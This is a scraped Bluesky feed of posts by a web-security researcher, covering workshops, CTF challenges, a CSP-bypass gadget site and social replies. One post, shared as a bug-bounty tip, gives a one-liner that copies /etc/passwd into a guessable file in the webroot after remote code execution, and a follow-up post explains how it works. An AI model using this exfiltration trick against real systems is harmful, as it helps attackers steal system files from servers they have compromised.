Advertisement · 728 × 90

Posts by Adam Langley

Haha, love the fact we got to see your whole thought process haha, nice work :)

1 year ago 1 0 0 0
Post image

Secure Coding Challenge…

What is insecure about this code? And how would you extract a file? For example /etc/passwd

1 year ago 0 0 2 0

If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.

1 year ago 1 1 0 0

So say we have the webroot:

/var/www/you-cant-guess/

And a file located here: /var/www/you-cant-guess/assets/uniquefile.png

The above command becomes:

cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt

1 year ago 0 0 0 0

Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?

All you need to know is a uniue filename in the webroot.

$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )

#bugbountytips #hacking

1 year ago 2 0 1 0

Merry Christmas!

1 year ago 1 0 0 0
Post image

I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...

1 year ago 0 0 0 0

Thank you mate, I try :)

1 year ago 0 0 0 0

Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.

1 year ago 1 1 1 0

I once did one side of a cube, that's the furthest I've got haha

1 year ago 1 0 0 0
Advertisement

Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"

1 year ago 2 0 1 0

2 Hours in and weirdly not tired. Just covered our SQL Injection module.

1 year ago 0 0 0 0
Post image

Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!

1 year ago 1 1 0 1

👋

1 year ago 0 0 0 0

Oh yeah, totally all downhill from here.

1 year ago 0 0 1 0

Ah Happy Birthday dude, welcome to the 40 club!

1 year ago 1 0 1 0

Yeah I totally agree, it feels so much calmer here.

1 year ago 0 0 1 0
Advertisement

Ah nice, you too buddy :)

1 year ago 0 0 0 0
Video

Hey BlueSky!

I case you missed it:

I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.

It already contains a bunch of useful gadgets with contributions from your favourite hackers.

If you have some CSP bypasses to share, feel free to contribute!

1 year ago 71 24 1 1
Post image

I'm delivering a talk about web app security ( or the lack of it ) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of Decemeber! See yowcon.com for more detail.

1 year ago 4 0 0 0

Can't work out whether you're giving a talk or belting out a song :)

1 year ago 1 0 0 0

Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php

1 year ago 7 2 0 0